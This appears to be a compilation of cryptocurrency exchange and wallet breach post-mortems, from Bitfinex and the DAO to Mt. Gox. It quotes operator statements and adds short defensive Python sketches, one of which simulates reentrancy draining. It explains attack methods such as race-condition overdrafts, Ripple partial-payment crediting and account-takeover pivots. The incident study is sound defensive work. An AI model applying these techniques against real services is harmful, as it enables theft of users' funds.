Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly. Transactions sent to any fraudulent address after our website was shut down will not be compensated.
It is unfortunate for us to announce that we have suffered a hacking attack during our Token Sale event. During the attack $7 Million were stolen by a currently unknown perpetrator. The CoinDash Token Sale secured $6.4 Million from our early contributors and whitelist participants and we are grateful for your support and contribution.
(Will update post when more thorough information is available. For now, view bravenewcoin.com.)
“The employee PC, not the head office server, was hacked. Personal information such as mobile phone numbers and email addresses of some users was leaked. However, some customers were found to have had funds stolen because of the one-time passwords used in electronic financial transactions.”
Due to a programming error in the implementation of Zerocoin, an attacker was able to exploit a single proof to generate multiple spends, which they could send to an exchange, sell, and then withdraw as funds.
Significant documentation on the breach is available.
From what we can see, the attacker (or attackers) is very sophisticated and from our investigations, he (or she) did many things to camouflage his tracks through the generation of lots of exchange accounts and carefully spread out deposits and withdrawals over several weeks. We estimate the attacker has created about 370,000 Zcoins which has been almost completely sold except for about 20,000+ Zcoin and absorbed on the market with a profit of around 410 BTC. In other words, the damage has already been mostly absorbed by the markets.
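The fix for a reused-proof bug of this kind is to track spent serial numbers so each zero-knowledge spend is accepted at most once. A minimal sketch with hypothetical names (proof verification itself is abstracted away as a boolean):

```python
# Sketch: each Zerocoin-style spend carries a serial number; a spend is
# valid only if its proof verifies AND the serial has never been seen.
# Omitting the second check is what allows one proof to be redeemed many times.
class SpendValidator:
    def __init__(self):
        self.seen_serials = set()  # serial numbers already spent on-chain

    def accept_spend(self, serial: str, proof_valid: bool) -> bool:
        if not proof_valid:
            return False
        if serial in self.seen_serials:
            return False  # replayed or duplicated proof: reject
        self.seen_serials.add(serial)
        return True

v = SpendValidator()
assert v.accept_spend("s1", proof_valid=True) is True
assert v.accept_spend("s1", proof_valid=True) is False  # reuse rejected
```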
Most information related to this breach is in Polish. Bitcurex warned users not to use previous deposit addresses, which indicates a breach. No information on a root cause is easily available.
Follow-up investigation of the blockchain has mostly been done by the Polish bitcoin press, which estimates a 2,300 BTC loss.
This is Bitfinex’s second appearance in the graveyard.
All information below is inferred from, or taken directly from, reddit comments by Bitfinex employees. Employees repeatedly suggest in comments that an internal breach allowed an attacker to interact with their BitGo implementation, and that BitGo’s security was not compromised.
Bitfinex suggests in these comments that several withdrawal limits existed per user and system wide, and employees are unsure how they were bypassed.
BitGo is a multisignature solution that heavily protects against loss from a single key material breach. This approach greatly mitigates many of the risks associated with BTC, but still carries the burden of securely storing API secrets and taking advantage of the mitigations available in the API implementation.
At the end of the day, an application interacts with an API that signs transactions.
The victims have strongly cleared BitGo of fault; it appears Bitfinex may not have taken advantage of (or may have incorrectly used) the security controls available to them through the BitGo API.
Employees have also stated that per-user HD wallets backed by the BitGo API were used in lieu of any truly offline cold storage solution. This implementation suggests that authentication to BitGo’s API was “warm” or “hot”, leaving API and signing keys to reside on servers that could be remotely accessed by an attacker. It was also suggested that every Bitfinex BTC holder used this approach, meaning the vulnerability carried a 100% risk of bitcoin loss across the board.
It has not yet been disclosed how the servers were accessed or how the attacker positioned themselves for an attack like this; I will update if that information becomes available.
We are investigating the breach to determine what happened, but we know that some of our users have had their bitcoins stolen. We are undertaking a review to determine which users have been affected by the breach. While we conduct this initial investigation and secure our environment, bitfinex.com will be taken down and the maintenance page will be left up.
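Given the architecture described above, a co-signing service can enforce limits independently of the application. A hypothetical sketch (the `CoSigner` class, limit value, and names are invented, not BitGo's actual policy API): even if an application server holding one multisig key is breached, an independent policy check at the co-signer caps losses.

```python
# Sketch: the co-signer refuses to complete a multisig withdrawal once a
# per-user daily limit is exceeded, so stolen API credentials alone
# cannot drain every wallet in one pass.
from collections import defaultdict

DAILY_LIMIT_BTC = 10.0  # invented threshold for illustration

class CoSigner:
    def __init__(self):
        self.spent_today = defaultdict(float)  # user -> BTC approved today

    def approve(self, user: str, amount_btc: float) -> bool:
        if self.spent_today[user] + amount_btc > DAILY_LIMIT_BTC:
            return False  # over limit: escalate to manual review instead
        self.spent_today[user] += amount_btc
        return True

cs = CoSigner()
assert cs.approve("alice", 6.0) is True
assert cs.approve("alice", 5.0) is False  # would exceed the daily limit
```

The design point is that the limit lives on a system the application servers cannot modify; a velocity check enforced by the same breached server offers no protection.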
While technically an application vulnerability, this breach is interesting in that the vulnerability was within an Ethereum contract. This has made the ability to patch or restore funds a very dramatic and unique situation involving miner consensus and the philosophy of Ethereum’s purpose as a technology. Hard and soft forks to reverse the attack were considered, with contention.
An attack has been found and exploited in the DAO, and the attacker is currently in the process of draining the ether contained in the DAO into a child DAO. The attack is a recursive calling vulnerability, where an attacker called the “split” function, and then calls the split function recursively inside of the split, thereby collecting ether many times over in a single transaction.
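The recursive calling pattern described above can be simulated outside of Solidity. A minimal Python sketch (hypothetical, not the actual DAO contract code): the vulnerable withdraw pays out before zeroing the balance, so a re-entrant recipient is paid multiple times from a single balance.

```python
# Simulation of a DAO-style reentrancy bug: the "send" (payout) happens
# before the balance update, and the recipient callback re-enters
# withdraw() while the stale balance is still nonzero.
class VulnerableDAO:
    def __init__(self, balances):
        self.balances = dict(balances)
        self.paid_out = 0.0

    def withdraw(self, user, recipient_callback, depth=0):
        amount = self.balances.get(user, 0.0)
        if amount <= 0:
            return
        self.paid_out += amount                # payout happens first...
        recipient_callback(self, user, depth)  # ...attacker re-enters here
        self.balances[user] = 0.0              # ...balance zeroed too late

def attacker(dao, user, depth):
    if depth < 2:  # re-enter a couple of times before letting it unwind
        dao.withdraw(user, attacker, depth + 1)

dao = VulnerableDAO({"attacker": 10.0})
dao.withdraw("attacker", attacker)
print(dao.paid_out)  # 30.0: three payouts from a single 10.0 balance
```

The fix mirrors the Solidity guidance: update state before making the external call, so the re-entrant call sees a zero balance.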
This breach is unique in that it attacked Cold Storage.
It is just as important to protect the deposit path into cold storage as the cold storage itself. If the deposit process is modified, it’s as if you don’t have cold storage at all.
We have previously communicated the fact that most clients’ crypto-asset funds are stored in multi-signature cold wallets. However, the malicious external party involved in this breach, managed to alter our system so that ETH and BTC deposit transfers by-passed the multi-sig cold storage and went directly to the hot wallet during the breach period. This means that losses of ETH funds exceed the 5% limit that we imposed on our hot wallets.
Not much data available, but in a transition to shut down their wallet product, they somehow leaked a password database.
While we were turning off servers, disabling firewalls and cleaning up backup systems today, we may have leaked a copy of our database. Although passwords into Coinkite.com are not useful anymore, you can rest assured that passwords were salted and SHA256 hashed with 131,072 rounds. If you used the same password on other sites, as a precaution, you may want to consider changing those other accounts. It’s possible you will see spam to your related email addresses.
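Coinkite’s description (“salted and SHA256 hashed with 131,072 rounds”) resembles an iterated key-derivation scheme. Their exact construction is not public, so PBKDF2-HMAC-SHA256 stands in here as a sketch of the general approach:

```python
# Sketch of salted, iterated password hashing: each password gets a random
# salt, and the digest is derived over many rounds to slow brute force.
import hashlib
import hmac
import os

ROUNDS = 131_072  # round count quoted in the Coinkite statement

def hash_password(password, salt=None):
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)
    return salt, digest

def verify(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)
    return hmac.compare_digest(candidate, digest)  # constant-time compare

salt, digest = hash_password("correct horse battery staple")
assert verify("correct horse battery staple", salt, digest)
assert not verify("wrong guess", salt, digest)
```

Even with this in place, their advice stands: reused passwords on other sites should be rotated, since enough offline time defeats any iterated hash of a weak password.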
Application vulnerability due to a lack of input sanitization, type unknown, though the statement references a “database call”, which implies some form of database injection such as SQLi.
Strangely, they claim that no coins were lost, though CoinWallet shut down anyway.
It is with great regret that we announce the closure of CoinWallet.co.
Our decision to close is based on several factors. Primarily, on the 6th of April we suffered a data breach.
Despite our best efforts there was a small error in a part of our code that should have checked and sanitized user input on a recently added function. Checks were in place but the check was then subsequently not used to block the database call.
Our backup security system kicked in as it was designed to and no coins were lost. We have since patched the vulnerability but are still trying to determine the extent of the breach. However it would be advised to change passwords on any other crypto related websites where you use the same password and username as coinwallet.co. We used encrypted and salted passwords but given enough time these should be assumed compromised.
Effective immediately, we have reset all passwords, deleted all API keys, and halted the twitter Tip Bot.
This incident prompted us to reassess the viability of running coinwallet.co and it was decided it is just not viable taking into consideration the risk, costs and time involved.
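The failure mode CoinWallet describes, a sanitization check that was written but never applied to the database call, is avoided entirely by parameterized queries, which need no separate sanitization step. A minimal sqlite3 sketch (the table and fields are invented for illustration):

```python
# Sketch: placeholder binding treats user input strictly as data, so a
# forgotten sanitization step cannot turn input into SQL.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, balance REAL)")
conn.execute("INSERT INTO users VALUES ('alice', 5.0)")

def get_balance(conn, username):
    # The ? placeholder binds the value; no string concatenation occurs.
    row = conn.execute(
        "SELECT balance FROM users WHERE name = ?", (username,)
    ).fetchone()
    return row[0] if row else None

assert get_balance(conn, "alice") == 5.0
assert get_balance(conn, "alice' OR '1'='1") is None  # injection is inert
```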
Not much data available, other than that it has completely shut down after a suspected breach.
This issue is currently under investigation and it is our intention to have the balance of your account settled as soon as possible. We sincerely apologize for this unfortunate inconvenience and will keep you posted on the progress of this issue. In the meantime, we have halted deposits, withdrawals and trading activity until this matter has been resolved.
Not much detail provided, and it appears damage was fairly limited for unknown reasons.
On Monday, March 14, 2016, our server fell victim to an attack that gave the attacker unauthorized administrative access. The breach was immediately noticed, and the server was shutdown to prevent any further damage. We are still performing a formal investigation to determine the attack vector, and specifically what information was obtained from the server. Due to additional security mechanisms in place, no funds were taken, and all ID’s (driver’s licenses, passports, etc.) and emails remain secured. Sellers were emailed withdrawal instructions Tuesday evening. All outstanding orders and withdrawals have been processed. Only 3% of all funds remain unclaimed.
Extremely detailed post-mortems are available from this breach, involving an external hacker collaborating with an insider threat.
On March 14th, ShapeShift had 315 Bitcoin stolen from its hot wallet. It was quickly discovered that an employee at that time had committed the theft. It was reported to relevant authorities, and a civil suit was opened against the individual. As we had quickly figured out who it was, and how to resolve it internally, we were able to keep the site running uninterrupted. We planned to get the stolen property returned, and thought that was the end of it.
A maliciously placed application vulnerability: a dependency (Lucky7Coin) was backdoored by a malicious developer and abused for months to pull off an attack.
After a period of time of investigation it was found that the developer of Lucky7Coin had placed an IRC backdoor into the code of wallet, which allowed it to act as a sort of a Trojan, or command and control unit. This Trojan had likely been there for months before it was able to collect enough information to perform the attack.
Very little information, other than that wallets were compromised.
BIPS has been a target of a coordinated attack and subsequent security breached. Several consumer wallets have been compromised and BIPS will be contacting the affected users.
Most of what was recoverable from our servers and backups has now been restored and we are currently working on retrieving more information to get a better understanding of what exactly happened, and most of all what can be done to track down who did it.
The attacker spearphished the CFO (with what looks to be a compromised email account or server belonging to someone else; this is unclear) and successfully acquired his credentials with a phishing page.
These credentials were then used to communicate with the CEO and request multiple large transfers amounting to $1.8 Million USD. A customer pointed out the fraud.
Below is the root cause as pointed out by court documents.
On or about December 11, 2014, Bryan Krohn, the CFO of Bitpay, received an email from someone purporting to be David Bailey of yBitcoin (a digital currency publication) requesting Mr. Krohn comment on a bitcoin industry document.
Unbeknownst to Mr. Krohn, or anyone at Bitpay, Mr. Bailey’s computer had been illegally entered (i.e. “hacked”).
The phony email sent by the person who hacked Mr. Bailey’s computer, directed Mr. Krohn to a website controlled by the hacker wherein Mr. Krohn provided the credentials for his Bitpay corporate email account.
After capturing Mr. Krohn’s Bitpay credentials, the hacker used that information to hack into Mr. Krohn’s Bitpay email account to fraudulently cause a transfer of bitcoin.
The hacker illegally hacked Mr. Krohn’s computer so he could use his or her computer to send false authorizations to Bitpay on December 11 and 12, 2014.
It is this hacking which fraudulently caused the transfers of bitcoin and therefore the loss to Bitpay of bitcoin valued at $1,850,000 (the “Loss”).
Bitpay cannot recapture the lost bitcoin.
An attacker defaced the cloudminr.io website with a “database for sale” message containing usernames and passwords.
According to various reports, the site was hacked on or about July 7th, with the main page of the service being amended over the weekend to offer the sale of customer login and personal information, along with a CSV (comma separated values) taste-test of the details of 1,000 customers’ personal details by the hackers to demonstrate that they were the “real deal.”
If a leaked incident report is to be believed, a VBA script embedded in a Word document was delivered via social engineering tactics over Skype to several employees. The malware was detonated on the machine of a system administrator who also had access to wallet.dat files and wallet passwords. 18,866 BTC were lost as deposits were stolen over the course of several days.
Bitstamp experienced a security breach on Jan. 4th. Security of our customers’ bitcoin and information is a top priority for us, and as part of our stringent security protocol we temporarily suspended our services on January 5th. All bitcoin held with us prior to the temporary suspension of services starting on January 5 (at 9 a.m. UTC) are completely safe and will be honored in full. We are currently investigating and will reimburse all legitimate deposits to old wallet addresses affected by the breach after the suspension.
A small hot wallet compromise, although it is uncertain how the wallet keys were accessed.
Dear Customer although we keep over 99.5% of users’ BTC deposits in secure multisig wallets, the small remaining amount in coins in our hot wallet are theoretically vulnerable to attack. We believe that our hot wallet keys might have been compromised and ask that all of our customer cease depositing cryptocurrency to old deposits addresses. We are in the process of creating a new hot wallet and will advise within the next few hours. Although this incident is unfortunate, its scale is small and will be fully absorbed by the company. Thanks a lot for your patience and comprehension. Bitfinex Team
An attacker used a simple account takeover with multiple pivots to gain server access to a wallet.
With administrative access to WordPress, the attacker was able to upload PHP-based tools to explore the filesystem and discover stored secrets. From there, database credentials were accessed and another PHP-based database tool was used to access a database and modify an off-chain ledger. The attacker then dodged double-accounting systems by discovering loopholes around the purchase/sale of bitcoins.
This deserves a full read and is one of the better post mortems in the graveyard.
Around 8PM on Sunday (all times EDT) our marketing director’s blog account requested a password reset. Up until the writing of this post (Wednesday morning, 10am) we do not know how the thief managed to know the marketing director’s (will refer to this as MD from here) account. Our best guess is it was an educated guess based on info found (more on that in a moment). The MD saw this email come in, and forwarded it to myself, and another team member (a technical lead/temporary assistant support staff), letting us know what happened and that he did not request the password reset. I did not see the email at the time, as I was out, and it was not a huge red flag that would require a phone call. Once I returned home later, I saw the email, and logged into the server to double-check on things. That’s when I discovered the breach.
Apparently, the thief had gained access to the tech assistant’s email account. That email was hosted on a private server (not gmail, yahoo, etc). We have no idea how the password was acquired. We spent a lot of time this week downloading password lists from torrents, tor sites, etc, and could find his password in none of the lists. He assures us he did not use the password in multiple places, and that it was a secure password. Our best guess is that it was a brute force attempt. The mail server he uses used the dovecot package for IMAP mail, which, for reasons we cannot comprehend, does NOT log failed password attempts by default. Because of this, at first, we believed that the hacker somehow had the person’s password. But we do not know, and there is no way to know at this point how the password was found.
Application vulnerability involving a race condition for multiple currencies at Cryptoine.
According to a statement on the Cryptoine website, the firm claims that a “hacker found some race condition bug in our trading engine. Manipulation of orders gave him false balances.”
In a further update, Cryptoine claims that the hack only targeted hot wallets, saying that “our hot wallets was [sic] drained, coins: bitcoin, litecoin, urocoin, dogecoin, bitcoinscrypt, magi, darkcoin, dogecoindark, cannabis” but promises that all coins they still have will be returned to users “in correspondingly smaller quantities.”
Not much detail, other than a database breach and it seems all customers were paid back.
Effective immediately, CAVIRTEX intends to cease carrying on an active Bitcoin business and will be winding down its operations in an orderly manner. As a result, effective immediately, no new deposits will be accepted by CAVIRTEX. Trading on CAVIRTEX will be halted effective March 20, 2015. Effective March 25th, 2015, no withdrawals will be processed. CAVIRTEX will communicate with any account holders that continue to hold balances after March 25, 2015.
We have maintained 100% reserves. CAVIRTEX is solvent and remains in a position to accommodate all customer withdrawal requests received prior to March 25, 2015. However, On February 15, 2015 we found reason to believe that an older version of our database, including 2FA secrets and hashed passwords, may have been compromised. This database did not include identification documents.
Not much data, other than the name of a hacker and that they stole the entire wallet, shutting down ExCoin.
February 6th and 10th, the user ‘Ambiorx’ was able to gain access to all the Bitcoins on the Exco.in exchange. As a result we no longer have the means necessary to continue operation and are deeply saddened to announce we will be shutting down operations this month. The trading engine has been disabled and Exco.in user accounts will remain active, with the exception of Ambiorx’s account and those who may be affiliated.
Cloud infrastructure account takeover without a lot of detail.
Several hours ago one of our hosting accounts was hacked and the hacker got 50m NXT from this server.
It’s totally our fault and we are trying our best to cover all the loss. However 50m nxt is huge for us, we cannot afford it at the moment.
Not much information available, other than the victim stating that the hacker was putting a lot of effort towards their attack.
We have been constantly monitoring the hacking activities on our servers and 3 months back then we took the precautionary step to migrate our servers to a highly secured cloud site. Unfortunately, that didn’t stop the incident from happening last night. In the last 24 hours, our security team worked around the clock to trace back the codes and processes. At this moment, we have a pretty good idea of exactly how they did it. This was not a generalized attack. The hacker’s strategy was precisely calculated and well targeted to compromise a certain weakness on our server.
Cold storage is said to have limited losses greatly.
The consequence, allegedly, is that hackers sent deposit transactions for large amounts, e.g. 100,000, to Justcoin. They set the tfPartialPayment flag to something like .0001. The transaction would be perfectly valid, and any client unaware of this behavior in the protocol would likely not be checking for the DeliveredAmount field – since it was never documented until a week ago. The transaction Amount field says “100,000” but the DeliveredAmount is only .0001. The hacker gets credit for 100,000 but only deposits .0001. Then they make a small withdrawal, check the balance on the hotwallet address and drain as much as they can.
Ripple commented on the issue here and puts blame squarely on Justcoin’s implementation.
Justcoin did not implement partial payments correctly. The exchange falsely credited a non-KYC’d user for a deposit, and then allowed the user to illegitimately withdraw the funds from its hot wallet. For every transaction, an exchange needs to ensure the total of user balances plus the new deposit matches the balance of its Ripple cold and hot wallets. If these balances don’t match, the exchange should stop processing the transaction. Ripple Labs has engaged Justcoin in ongoing discourse about its lack of risk and compliance controls. As demonstrated by this incident, a non-KYC’d user can steal with little fear of being identified and owning the consequences.
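The check Justcoin was missing can be sketched directly: credit a Ripple deposit from the metadata’s delivered amount, never from the transaction’s `Amount` field. Field names below follow the rippled convention (`delivered_amount`, `tfPartialPayment`), but the transaction structure is simplified for illustration:

```python
# Sketch: how much to credit a depositor for an incoming Ripple payment.
# The Amount field is what the sender *asked* to deliver; only the
# metadata's delivered_amount says what actually arrived.
TF_PARTIAL_PAYMENT = 0x00020000  # tfPartialPayment flag bit

def credited_amount(tx: dict) -> float:
    meta = tx.get("meta", {})
    if "delivered_amount" in meta:
        return float(meta["delivered_amount"])
    # No delivered_amount recorded and the partial-payment flag is set:
    # credit nothing rather than trust the Amount field.
    if tx.get("Flags", 0) & TF_PARTIAL_PAYMENT:
        return 0.0
    return float(tx["Amount"])

partial = {"Amount": 100000, "Flags": TF_PARTIAL_PAYMENT,
           "meta": {"delivered_amount": 0.0001}}
assert credited_amount(partial) == 0.0001   # not 100,000
normal = {"Amount": 50, "Flags": 0, "meta": {}}
assert credited_amount(normal) == 50.0
```

(In real responses `delivered_amount` can also be an object for issued currencies; the scalar form here keeps the sketch short.)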
Not much data available, other than that a hacker supposedly stole a wallet and then extorted the operator for further funds.
While preparing for the final audit results, a task we were working on for weeks now, our bitcoin wallet has been hacked and emptied, just after exchanging our fiat holdings within the exchanges to bitcoin and transferring our entire holdings to our wallet, in order to proof our solvency.
It is a known fact that I personally opposed any proof of solvency, but agreed to conduct it for the sake of a few dozen small and medium investors.
The hacker contacted me shortly after he took advantage of our holdings and demanded a ransom in order to transfer the coins back. I have agreed to a 25% ransom of the entire sum, but haven’t heard back from him for several days now.
A very traditional application vulnerability (SQL injection) that was brought in by a third-party library. The attack manipulated their “escrow” product.
Whilst we have not yet completed our investigation, we have identified the attack vector as a vulnerability in a third party plugin. This was used to inject SQL queries into our database and manipulate the amounts on transactions being released from escrow. What we have not made public until now is that we have seen sustained and almost-daily attack attempts on the site for many months. We have been in contact with the Australian Federal Police regarding this, and will be sharing with them all data that we have on this attack as well as all previous attempts.
Little information provided.
A few hours ago we were unfortunately the subject of a successful attack against the exchange. Our investigations have shown that whilst our security was breached, VeriCoin was the target. We would like to stress that VeriCoin and the VeriCoin network has not been in any way compromised. We have worked to secure the exchange and the withdraw process from any further attack.
Little information provided, though the attackers seem to have accessed the DogeVault servers and a wallet directly.
We regret to announce that on the 11th of May, attackers compromised the Doge Vault online wallet service resulting in wallet funds being stolen. After salvaging our wallet we have ascertained that around 280 million Dogecoins were taken in the attack, out of a total balance of 400 million kept in our hot wallet. 120 million Dogecoins have been since recovered and transferred to an address under our control. It is believed the attacker gained access to the node on which Doge Vault’s virtual machines were stored, providing them with full access to our systems. It is likely our database was also exposed containing user account information; passwords were stored using a strong one-way hashing algorithm. All private keys for addresses are presumed compromised, please do not transfer any funds to Doge Vault addresses.
Not enough information, other than an infrastructure intrusion that breached the wallet.
Long story short: yes, our wallet server got hacked and all funds were withdrawn.
Poloniex is a Bitcoin exchange that has been operating since 2014. In March of 2014, an application vulnerability was exploited and caused a loss of 97 BTC (a 12.3% loss on the exchange). The reported cause of the hack was that they did not properly check for a negative account balance while processing multiple, simultaneous withdrawals.
The hacker found a vulnerability in the code that takes withdrawals. The hacker discovered that if you place several withdrawals all in practically the same instant, they will get processed at more or less the same time. This will result in a negative balance, but valid insertions into the database, which then get picked up by the withdrawal daemon.
What Will Be Done to Prevent Further Exploits?
Withdrawals and order creation have been switched to a queued method, where the first step is to add the task to a global execution queue that is processed sequentially. Each step of critical database operations is verified before proceeding, and such operations are in the process of being converted to transactions. I have hired additional developers to help with tightening up security at Poloniex, as well as created a bug bounty.
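The queued, verified approach Poloniex describes boils down to making the balance check and the debit a single atomic step, so simultaneous withdrawals cannot interleave between the check and the update. A minimal sketch using a lock (in SQL this would be a conditional UPDATE inside a transaction):

```python
# Sketch: check-and-debit under one lock. Two concurrent 60.0 withdrawals
# against a 100.0 balance can no longer both pass the balance check.
import threading

class Ledger:
    def __init__(self, balance: float):
        self.balance = balance
        self._lock = threading.Lock()

    def withdraw(self, amount: float) -> bool:
        with self._lock:           # check and debit happen atomically
            if amount > self.balance:
                return False       # would go negative: reject
            self.balance -= amount
            return True

ledger = Ledger(100.0)
results = []
threads = [threading.Thread(target=lambda: results.append(ledger.withdraw(60.0)))
           for _ in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()
assert results.count(True) == 1   # exactly one withdrawal succeeds
assert ledger.balance == 40.0
```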
A “front end” flaw implies an application vulnerability involving transactions between users of their application. It sounds like a race condition, given that thousands of requests were necessary to deplete the wallet before the off-chain ledger could update.
During the investigation into stolen funds we have determined that the extent of the theft was enabled by a flaw within the front-end. The attacker logged into the flexcoin front end from IP address 220.127.116.11 under a newly created username and deposited to address 1DSD3B3uS2wGZjZAwa2dqQ7M9v7Ajw2iLy. The coins were then left to sit until they had reached 6 confirmations. The attacker then successfully exploited a flaw in the code which allows transfers between flexcoin users. By sending thousands of simultaneous requests, the attacker was able to “move” coins from one user account to another until the sending account was overdrawn, before balances were updated.
If you trust the operators, they blame the famous “transaction malleability” vulnerability.
Our initial investigations indicate that a vendor exploited a recently discovered vulnerability in the Bitcoin protocol known as “transaction malleability” to repeatedly withdraw coins from our system until it was completely empty.
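Transaction malleability lets a relayer mutate a transaction so it confirms under a different txid with identical outputs; an exchange that re-sends whenever the original txid fails to confirm can be milked repeatedly. A hedged sketch of the usual mitigation (my own logic, not necessarily what any exchange implemented): track withdrawal state by an internal id and match confirmations by outputs, not by txid.

```python
# Sketch: decide whether a pending withdrawal should be re-broadcast.
# The txid is deliberately ignored; what matters is whether a confirmed
# transaction paying the same (address, amount) already exists on-chain.
def should_resend(withdrawal: dict, confirmed_outputs: set) -> bool:
    """confirmed_outputs: set of (address, amount) pairs seen confirmed."""
    key = (withdrawal["address"], withdrawal["amount"])
    return key not in confirmed_outputs

w = {"id": 42, "address": "addr_customer_1", "amount": 1.5, "txid": "abc123"}
# The broadcast confirmed under a mutated txid, but with the same outputs:
assert should_resend(w, {("addr_customer_1", 1.5)}) is False
# Nothing matching ever confirmed, so a resend is legitimate:
assert should_resend(w, set()) is True
```

A production version would also track the withdrawal id against spent inputs; the point of the sketch is only that txid equality is the wrong test under malleability.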
Very little information available.
As a result of a hacker attack, the BTC and LTC wallets were robbed. This fact was reported to law enforcement authorities.
The stolen BTC and LTC belonged to all users. If they are recovered, they will be returned to users in accordance with balances as of 17.11.2013.
This was a clear application vulnerability with a potentially fraudulent cover up and incident response. On July 28, 2013, hackers discovered an application condition that allowed them to credit accounts from a wallet supporting multiple organizations (Bitfunder and WeExchange). While the SEC found fraud, this seems to be more related to handling of the breach and operating an unregistered exchange.
During the summer of 2013, one or more individuals (the “Hackers”) exploited a weakness in the BitFunder programming code to cause BitFunder to credit the Hackers with profits they did not, in fact, earn (the “Exploit”). As a result, the Hackers were able to wrongfully withdraw from WeExchange approximately 6,000 bitcoins, with the majority of those coins being wrongfully withdrawn between July 28, 2013, and July 31, 2013. In today’s value, the wrongfully withdrawn bitcoin were worth more than $60 million. As a result of the Exploit, BitFunder and WeExchange lacked the bitcoins necessary to cover what MONTROLL owed to users.
Cloud infrastructure account takeover. Some kind of 2FA bypass exploit as well. Source code, wallets, and user data exfiltrated by attacker.
Two hacks totalling about 4100 BTC have left Inputs.io unable to pay all user balances. The attacker compromised the hosting account through compromising email accounts (some very old, and without phone numbers attached, so it was easy to reset). The attacker was able to bypass 2FA due to a flaw on the server host side. Database access was also obtained, however passwords are securely stored and are hashed on the client. Bitcoin backend code were transferred to 10;[email protected]:[email protected] (most likely another compromised server).
Cloud infrastructure compromise. After an initial credential breach, the attacker escalated access through social engineering. The victim blames the hosting provider for violating their own procedure for password resets.
The attacker has acquired login credentials to our VPS control account with our hosting service provider and has then asked for the root password reset of all servers which – unfortunately – the service provider has then done and posted the credentials in their helpdesk ticket, rather than the standard process of sending it to our email address (which has 2FA protection), also the security setup of allowing only our IP range to login to the management console was not working. It was an additional security feature the provider offered but was obviously circumvented by the attacker. As a result out of this incident we have moved all our services to a new provider who offers 2 factor authentication for all logins as well as other verification processes that we hope will make similar attempts impossible in the future.
This was an account takeover on the victim’s cloud provider, allowing access to a server hosting a hot wallet. This was part of a larger breach.
Someone managed to reset the password from our hosting provider web interface, this enabled the attacker to lock us out of the interface and request a reboot of the machine in ‘rescue’ mode. Using this, the attacker copied our hot wallet and sent away what was present.
This very hosting provider (OVH) had been compromised a couple of days ago, in the exact same way, leading to loss of funds on mining.bitcoin.cz.
Given that a database was accessed, this was probably a breach of infrastructure. Their comment about being “impossible to reopen” makes me wonder if it was off-chain and if they couldn’t trust their ledger.
The Instawallet service is suspended indefinitely until we are able to develop an alternative architecture. Our database was fraudulently accessed; due to the very nature of Instawallet, it is impossible to reopen the service as-is.
This is a tough translation but it seems like a clear application vulnerability involving some kind of coupon code system.
The Bitcoin market suffered an attack which, unfortunately, succeeded against its redeem-code implementation. Due to a coding error, it was possible for an attacker to generate new credit codes without the value being properly charged against a final balance. The attacker was thus able to generate a false amount of bitcoins within the system and withdraw them overnight.
Attacker pivoted several times after initially gaining access to the victim’s domain registrar via social engineering. This then allowed a DNS hijack, allowing them to route password resets to the attacker. Attacker then took over cloud infrastructure hosting wallets.
The attacker contacted our domain registrar at Site5 posing as me and using a very similar email address to mine. They did so by proxying through a network owned by a haulage company in the UK, whom I suspect are innocent victims the same as ourselves. Armed with knowledge of my place of birth and mother's maiden name alone (both facts easy to locate on the public record), they convinced Site5 staff to add their email address to the account and make it the primary login (this prevented us from deleting it from the account). We immediately realized what was going on and logged in to change the information back. After we changed this info and locked the attacker out, overnight he was able to revert my changes and point our website somewhere else. Site5 is denying any damages, but we suspect this was partly their fault.
After gaining access, they redirected DNS by pointing the nameservers to hetzner.de in Germany, and used Hetzner's nameservers to redirect traffic to a hosting provider in Ukraine. By doing this, the attacker locked out both my login and Gareth's login, hijacked our emails, and reset the login for one exchange (VirWox), enabling them to gain access and steal $12,480 USD worth of BTC. No other exchanges were affected, thanks to some combination of multi-factor authentication, OTP, YubiKeys, and automatic lockdowns.
The hacker was also able to pull a few hours of internal company emails. However, due to mandatory PGP encryption between members of our company and tools like Cryptocat, sensitive information was not breached.
The big one. Lots of speculation and not a lot of hard data. Everything from negligence to insider threat to fraud has been speculated.
On Monday night, a number of leading Bitcoin companies jointly announced that Mt. Gox, the largest exchange for most of Bitcoin’s existence, was planning to file for bankruptcy after months of technological problems and what appeared to have been a major theft. A document circulating widely in the Bitcoin world said the company had lost 744,000 Bitcoins in a theft that had gone unnoticed for years. That would be about 6 percent of the 12.4 million Bitcoins in circulation.
Mark Karpeles, the former CEO of Mt. Gox, told the Daily Beast last month, “I suspect that some of the missing bitcoins were taken by a company insider, but when I tried to talk to the police about it, they seemed disinterested.”
Attackers likely gained access through a cloud infrastructure provider and accessed a server with an unencrypted hot wallet.
Last night, a few of our servers were compromised. As a result, the attacker gained access to an unencrypted backup of the wallet keys (the actual keys live in an encrypted area). Using these keys, they were able to transfer the coins. This attack took the vast majority of the coins BitFloor was holding on hand. As a result, I have paused all exchange operations. Even though only a small minority of the coins are ever in use at any time, I felt it inappropriate to continue operating without the capability to cover all BTC account balances.
Infrastructure breach with access to a large hot wallet.
It is with much regret that we write to inform our users of a recent security breach at Bitcoinica. At approximately 1:00pm GMT, our live production servers were compromised by an attacker, who used this access to deplete our online wallet of 18,547 BTC.
A breach at Linode was the root cause here, and there's plenty of information available to understand it. Credentials for a customer support team member were used, and eight Linode customers were compromised for having affiliations with bitcoin.
After accessing the customer support interface, the attacker was able to access the individual account interface for each victim and change the root passwords on customers' machines. To apply the root password change, servers were rebooted.
A VP at Linode responded.
Somebody hacked my backup machine with pool data hosted on Linode and stole 3094 BTC (“hot” coins ready for payouts). The cold backup was not affected in any way by this hack.
It looks like the user database has also been compromised. Although passwords are stored as salted SHA-1 hashes, I strongly recommend changing your password on the pool immediately.
The robbery of bitcoins has no impact on pool users; I'm covering the loss from my own income (although it means that many months of my work are wasted).
Attackers made it onto Bitcoin7 infrastructure, as wallets and database data were accessed. Given that “other websites” were owned as well, it's possible that a larger, unknown shared hosting provider with other customers was compromised.
On Oct 5th 2011, Bitcoin7.com became the victim of a number of pre-planned hacker attacks. While our investigation is still ongoing, evidence reveals that the attacks originated from Russia and Eastern Europe.
